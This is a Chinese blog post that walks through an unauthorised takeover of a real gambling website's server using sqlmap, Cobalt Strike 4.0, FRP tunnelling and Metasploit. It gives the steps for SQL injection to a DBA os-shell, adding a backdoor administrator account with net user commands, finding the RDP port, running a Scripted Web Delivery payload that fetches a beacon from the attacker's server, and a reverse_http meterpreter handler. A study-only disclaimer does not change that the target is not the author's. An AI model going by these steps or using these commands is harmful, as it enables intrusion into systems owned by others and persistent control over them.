利用CS4.0和FRP拿下“打牌”网站服务器

环境的部署
- CS4.0服务器部署
- - 踩坑点
- frp部署
开始打牌
- 抓个包
还没有结束
- 声明：本文旨在技术学习研究，请勿用于违法用途，否则后果自负。

环境的部署

CS4.0服务器部署

这里用的是阿里云服务器，也可以部署在本地
首先上传cs4.0压缩包到服务器，执行解压

执行命令./teamserver ip passwd开启服务器

完成之后我们打开本地CS4.0连接服务器，Host就写服务器IP，密码也是之前写的

成功连接

踩坑点

服务器的端口一定要设置开启
修改teamserver的权限为777

frp部署

同样先把安装包上传到服务器端和客户端然后解压

服务器端将frps权限改为777，同时修改frps.ini文件，设置端口。

vim frps.ini

frps -c frps.ini开启服务

kali端其他同理

vim frpc.ini
server_addr就是服务器IP，端口就是之前设置的端口
local_ip回环就行，端口随便设置不常用的，后面要用到

./frpc -c frpc.ini开启服务

如果不想多开终端可以使用nohup+重定向

开始打牌

抓个包

找到后台页面

抓个登陆包

丢到sqlmap里面去跑跑，成功拿到数据库

这里找了一下终于在RYPlatforManagerDB里面找到了账户信息
密码是加密的，用自带的解密工具得出了顶级弱口令admin-admin

成功进入后台

乱点一通，没发现啥啥比较容易利用的，重新回到sqlmap
用–is-dba参数判断得出当前用户为DBA

接下来就使用–os-shell参数试试能不能拿到shell，经过漫长等待最终成功了

whoami发现令人惊喜一幕

这还能说啥，直接上命令了
net user test QWer1234! /add
net localgroup administrators test /add接下来就尝试一波RDP连接，不出意外失败了

思考了一下原因，决定从RDP这个服务本身开始进行排错
首先确认一下RDP这个服务是不是开着的，不管了直接用net start termservice的命令，反正最终也要打开这个服务

服务是开着的，那么可能性就多了，这时最怕遇到的就是管理员开了白名单，那就白忙活一场
既然都到这了肯定不能放弃，就先从最简单的点进行排错
由于sqlmap的回显是出奇的慢，得想个办法，在得到想要的结果的同时尽可能去缩减回显的内容，这样就可以加快回显的速度，提高效率。
经过一番百度，终得出这样的思路：既然服务开启，那么就会有对应的进程，RDP的服务对应的进程名称是svchost.exe,描述是termservice，那么可以查看带有termservice描述的svchost.exe进程去拿到进程PID，然后通过PID去获取服务的端口号，同时加上管道符|还能减少回显内容
尝试之后得到以下命令
tasklist /svc | findstr termservice
netstat -ano | findstr 进程号

这里出了点问题，回显竟然没有任何内容

理论上来说，肯定是有回显才对。
经过一番挣扎，发现忽略了一个细节！不能用termservice而是要用TermService，竟然忘记区分大小写了！
重新来过，成功拿到了进程PID 1908

有了PID，就可以反查端口

还好，管理员只是改了端口，并没有开启白名单，有了端口就可以用之前创建的账号进行连接了

看到这个弹窗，就知道有机可乘了
GET！

补丁倒是不少

还没有结束

本着不浪费的原则，还是cs上线一波，不然就白白浪费调试cs服务器的时间了

用cs客户端先建立listener，

然后选择Attacks->Web Drive-by->Scripted Web Delivery(s),host就写服务器地址，端口随便写，listener就选择刚刚创建的监听，可以得到一条让目标上线的payload

用shell去执行这个payload，过一会就能上线cs了

成功上线~至于为啥会上线这么多个，我也还在思考中，
右键目标，就可以使用很多种攻击方式了

因为菜，所以这是个裸的cs4.0，那么还是回到kali吧
用配置好的frp尝试把这个shell反弹到msf试试
这里需要在cs上重新建立一个新的listener

然后进入msfconsle设置监听本地的1235端口

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set lport 1235
msf5 exploit(multi/handler) > set lhost 127.0.0.1
msf5 exploit(multi/handler) > run

因为我的1234被占用了我就换成了1235

到cs中右键目标->spawn
选之前建立的msf监听器就行了

不出意外的话，过十秒钟msf就能接受到服务器弹过来的shell，但是这里突然出现了一个状况，cs提示beacon exit , 之前sqlmap的os-shell也断了

我怀疑是管理员上线了，被迫放弃。看来是天意，那就到此为止
总结一下，收获还不错
RDP回去清理了一下战场，收工走人

雕虫小技，大佬多多指点~

声明：本文旨在技术学习研究，请勿用于违法用途，否则后果自负。

利用CS4.0和FRP拿下“打牌”网站服务器相关推荐

服务器可以装win7或win10系统吗,win10改win7用legacy还是uefi？_网站服务器运行维护,window...
win7系统关机一直转圈(关不了机)是什么原因?_网站服务器运行维护 win7系统关机一直转圈的原因:1.病毒或一些应用程序或者系统任务有可能造成不能关机或关机慢:2.外设和驱动程序兼容性不好,不能响 ...
利用cobaltstrike加sqlmap拿下一个网站并提权
利用cobaltstrike加sqlmap拿下一个网站并提权 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器.自3.0以后已经不在使用Metasploit框架而作为 ...
渗透工具之CS4.0使用说明书
CS4.0使用说明书目录安装使用运行监听器 listner 使用不同监听介绍木马生成后门钓鱼攻击邮件钓鱼功能上部选项栏下部工具栏 beacon的使用会话功能安装使用安装 ...
利用该0 day漏洞的攻击活动情况
谷歌研究人员发现macOS漏洞利用. 谷歌研究人员在macOS系统中发现了一个安全漏洞--CVE-2021-30869.攻击者利用该漏洞可以以kernel权限执行任意代码.8月底,谷歌研究人员发现了该 ...
当WEB2.0从概念变成电子商务网站的工具
当一些WEB2.0模式的网站还将WEB2.0作为概念吸引疯投注意的时候,电子商务巨头亚马逊已经成功地将博客(BLOG)和标签(tag)等具有典型WEB2.0特征的技术和思想应用网站的经营,使得WEB2 ...
第1节-从0到1快速建设网站-最终实现商业化盈利
虽互不曾谋面,但希望能和您成为笔尖下的朋友以读书,技术,生活为主,偶尔撒点鸡汤不作,不敷衍,意在真诚吐露,用心分享点击左上方,可关注本刊标星公众号(ID:itclanCoder) 如果不知道如 ...
利用Python为女神制作一个专属网站
快跟随小编一起学习一下如何利用Python语言制作一个专属的网站送给女神吧! 如觉得博主文章写的不错或对你有所帮助的话,还望大家多多支持呀!关注.点赞.收藏.评论. 目录如觉得博主文章写的不错或对你 ...
群晖 python_利用群晖Docker安装ubuntu16.04搭建python网站服务器（安装篇）
折腾的原因:我目前有两个网站需要挂载,因为为了玩,并不是为了大流量,所以就挂在家里的群晖中.一个是小圈子(www.cirdown.com:81),因为用的是discuz论坛,php的,所以直接用我的黑 ...
HTML加入IP限制代码,利用HTML实现限制ip的投票网站作弊方案
提要:如果大家有任何疑问请给我留言,小编会及时回复大家的.在此也非常感谢大家对素材圈的支持!若你觉得本文对你有帮助,欢迎,烦请注明出处,谢谢! 不少人想了解关于利用HTML实现限制ip的投票网站作弊方 ...

利用CS4.0和FRP拿下“打牌”网站服务器

利用CS4.0和FRP拿下“打牌”网站服务器

环境的部署

CS4.0服务器部署

踩坑点

frp部署

开始打牌

抓个包

还没有结束

声明：本文旨在技术学习研究，请勿用于违法用途，否则后果自负。

利用CS4.0和FRP拿下“打牌”网站服务器相关推荐

最新文章

热门文章